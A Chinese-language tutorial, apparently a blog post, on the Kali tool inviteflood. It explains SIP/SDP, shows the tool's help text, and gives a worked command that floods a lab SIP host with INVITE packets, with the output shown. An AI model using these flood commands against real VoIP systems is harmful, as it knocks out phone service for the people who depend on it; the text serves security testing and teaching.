inviteflood -SIP/SDP 泛洪攻击

0x00前言

会话发起协议（Session Initiation Protocol，缩写SIP）
会话描述协议（Session Description Protocol或简写SDP）描述的是流媒体的初始化参数。
SIP与H.323一样，是用于VoIP最主要的信令协议之一。SIP最初由IETF标准化和管理，而H.323VoIP协议则从传统上与ITU有着更多的联系。
SIP的设计目标之一是提供类似公用交换电话网（PSTN）中呼叫处理功能的扩展集。在这个扩展集中，实现类似日常电话的操作：拨号，振铃，回铃音或者忙音，只是实现方式和术语有所不同。
SIP也实现了许多七号信令系统(SS7)中更高级的呼叫处理功能，尽管这两个协议相差很远。SS7是一个高度集中处理的协议，其特点表现为高复杂度的中心网络结构和无智能的哑终端(传统的电话机)。SIP则是一个点对点协议，所以它只需要一个相对简单的(因此也高度可扩展的)核心网络，而将处理工作下放给连接在网络边缘的智能端点(装有硬件或软件的终端设备)。SIP的许多功能在端点中实现，这与传统的SS7将其在网络核心设备实现的作法大异其趣。
SIP同HTTP相似并采用了后者的一些设计原则：SIP报文是人类可读的，并且也是采取请求-应答的流程。SIP借用了许多HTTP状态码，如常见的'404 not found'。
SDP用于和RTSP以及SIP协同工作，也可被单独用来描述多播会话。

0x01 简介

  通过TCP/UDP进行泛洪攻击的SIP/SDP会话，该工具可以在本i机产生大量的流量，因为需要在本地读取数据进行对外发送。所以在流量监控时可能会产生40M/s的速度。

使用帮助

root@kali:~# inviteflood -h
inviteflood - Version 2.0
              June 09, 2006
 Usage:
 Mandatory -
    interface (e.g. eth0)
    target user (e.g. "" or john.doe or 5000 or "1+210-555-1212")
    target domain (e.g. enterprise.com or an IPv4 address)
    IPv4 addr of flood target (ddd.ddd.ddd.ddd)
    flood stage (i.e. number of packets)
 Optional -
    -a flood tool "From:" alias (e.g. jane.doe)
    -i IPv4 source IP address [default is IP address of interface]
    -S srcPort  (0 - 65535) [default is well-known discard port 9]
    -D destPort (0 - 65535) [default is well-known SIP port 5060]
    -l lineString line used by SNOM [default is blank]
    -s sleep time btwn INVITE msgs (usec)
    -h help - print this usage
    -v verbose output mode

0x02 使用示例

使用接口eth0 并且提供5000用户,使用100个包向目标域名(example.local) 和泛洪主机(192.168.1.5) 进行泛洪攻击。
root@kali:~# inviteflood eth0 5000 example.local 192.168.1.5 100
inviteflood - Version 2.0
              June 09, 2006

source IPv4 addr:port   = 192.168.1.202:9
dest   IPv4 addr:port   = 192.168.1.5:5060
targeted UA             = 5000@192.168.1.1

Flooding destination with 100 packets
sent: 100

欢迎大家分享更好的思路，热切期待^^_^^ !!！